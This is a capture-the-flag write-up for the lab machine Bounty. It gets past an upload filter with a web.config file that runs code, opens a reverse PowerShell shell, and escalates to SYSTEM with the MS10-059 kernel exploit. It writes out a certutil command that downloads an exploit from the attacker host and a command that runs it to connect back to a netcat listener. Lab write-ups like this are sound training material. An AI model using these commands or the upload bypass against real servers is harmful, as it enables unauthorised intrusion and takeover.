# BOUNTY | 10.10.10.93

## Initial Enumeration

    sudo nmap -v -T4 -sV -sC -oN nmap-initial 10.10.10.93
    
### Open Ports and Their Services

* 80 - HTTP - Microsoft IIS 7.5

## Service Enumeration

### 80 - Microsoft IIS 7.5

The version of the web server means I'm dealing with either Windows 7 or Windows Server 2008 R2. There is just a simple page with a cartoon image of the wizard Merlin:

![](img/merlin.jpg)

Gobuster finds two directories: one is a simple file uploader, and the other is a directory for viewing the uploaded files:

![](img/gobuster.png)

So far, the uploader only seems to accept image files - I tried a simple text file and it was rejected, it stands to reason something like a webshell would be rejected as well.

To confirm I fire up BurpSuite and observe what happens when I try to upload 'cmadasp.aspx', a simple webshell.

![](img/invalid.png)

However, if I give the file a .png extension then it gets accepted:

![](img/success.png)

But I can't access the webshell because the browser is trying to display it as an image:

![](img/errors.png)

At least this tells me that the filter that is in place is really just checking the last extension (if I do `cmdasp.png.aspx` it fails). I just need to find a way to trick it. Perhaps the filter is not so robust and it forgets to reject some asp-like file extensions.


The only extension that was allowed that surprised me was the .config extension, however upon navigating to the file it was 404'd. But I kept looking into it and found [this](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/) old resource that actually helped.

![](img/POC.png)

Copying this POC code as a test and naming it 'web.config' was a successful upload, and it showed that it could execute code:

![](img/rce.png)

## Foothold

But I could not get it to execute the code from neither the asp nor aspx webshells. Also I noticed that the files were getting deleted every few minutes, so it would not be any use anyway. I would have to work to use some code to execute a powershell download command so I get a new shell straight from the machine, and not a webshell.

Looking more closely at one of the webshells there is a COM object called "WSCRIPT.SHELL" and that object is what executes the actual shell command:

![](img/wscript.png)

If I grab that part of code and modify it to execute the powershell command and put it in the web.config file, hopefully it'll execute. I'm using the 'InvokePowershellTCP' script from nishang.

I start a server to serve up the reverse shell, and spin up a netcat listener on the appropriate port.

Fingers crossed that this works:

![](img/user-shell.png)

It did, and I am the user merlin.

The flag was hidden, so I had to use `ls -force` to see that it was there:

![](img/user-flag.png)

## User Enumeration

`systeminfo` tells me this is Windows Server 2008 R2 and 64-bit; and there are no hotfixes installed.

The merlin user has 'SeImpersonatePrivilege' enabled, so I might be able to do a Potato attack to get administrator privileges.

No luck with the version of winPEAS I am using, it was most likely compiled with a different version of .NET so it will not work here. I'm not going to bother with spinning up a Windows VM just to recompile winpeas, so let's move on to PowerUp.

Nope. This user does not have enough privileges even to run that thing. Luckily there is one other option here, since I noticed that this machine has no hotfixes. I can use the output from `systeminfo` to run Windows Exploit Suggester on my local machine.

![](img/winexploits.png)

## Privilege Escalation via the Chimichurri (MS10-059) exploit

I've used this one on another box (I think it was Devel), do let's hope it works.First I have to get it over to the machine:

    certutil -urlcache -f "http://10.10.14.20:8080/chimi.exe" chimi.exe
    
Next I have to spin up another netcat listener, to catch the connect back from the exploit:

    nc -nvvlp 7777
    
Now all that is left is to execute:

    ./chimi.exe 10.10.14.20 7777
    
And I am now NT AUTHORITY\SYSTEM:

![](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

It was interesting to have things only kind of work, or to have to take snippets of code from one place and paste them into another snippet. The file filtering in the uploader was basic and what took a while to figure out was the correct way to craft the asp script to create a command. It's a good reminder to look very closely at the tools that are already there to determine if they have functions or parts that can do the job for you.

A lot of the machines that I have been doing have had privescs that involved 3rd party programs or common misconfigurations, so it was a surprise that this one was a plain old kernel exploit. I haven't really collected too many of those and it is always a risk just grabbing exe files from github without really knowing what they could be doing. I'll have to get into compiling them myself (but I would really want to learn how to do that in Linux only).

Steps taken:

* Find uploader on webpage
* Bypass file filter to upload .config file with embedded asp script that executes reverse powershell
* Use chimichurri kernel exploit to get root shell
